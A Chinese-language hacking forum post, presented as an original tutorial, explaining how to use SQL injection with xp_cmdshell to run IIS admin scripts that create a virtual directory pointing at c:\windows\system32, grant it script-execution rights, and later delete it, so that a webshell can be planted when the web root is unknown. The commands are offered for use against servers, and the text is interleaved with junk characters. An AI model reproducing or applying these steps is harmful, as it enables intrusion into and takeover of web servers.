返回列表 发帖

[原创教程] 如何SQL注入建立虚拟目录

很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:
* x7 m" n4 I6 Y9 Y! z+ s2 f/ a7 j- V! d9 o) G
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'9 M+ G) f' D; f. F5 l! w3 C
建立虚拟目录win,指向c:\windows\system32. V. Y1 ?. P0 {) F  w
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'; l+ d* y9 \9 H: P6 y( u( j5 L
让win句有解析asp脚本权限
. e0 b' ~4 y- k4 X6 ~
0 @2 R$ m9 M1 `, ^- g4 n% |exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"0 W  }. z/ B5 e7 x
删除虚拟目录。: T2 B7 s8 I, E! E$ @1 G& {
找不到web绝对路径的一种解决办法,- Z' `4 V; |- c+ a6 t6 ^/ Y  I
4 \6 ?0 B( Z& f$ F" o' U7 k8 u: M
403错误,表示虚拟目录建好了。。
1

评分人数

呀  LZ好久不见你上了啊

TOP

返回列表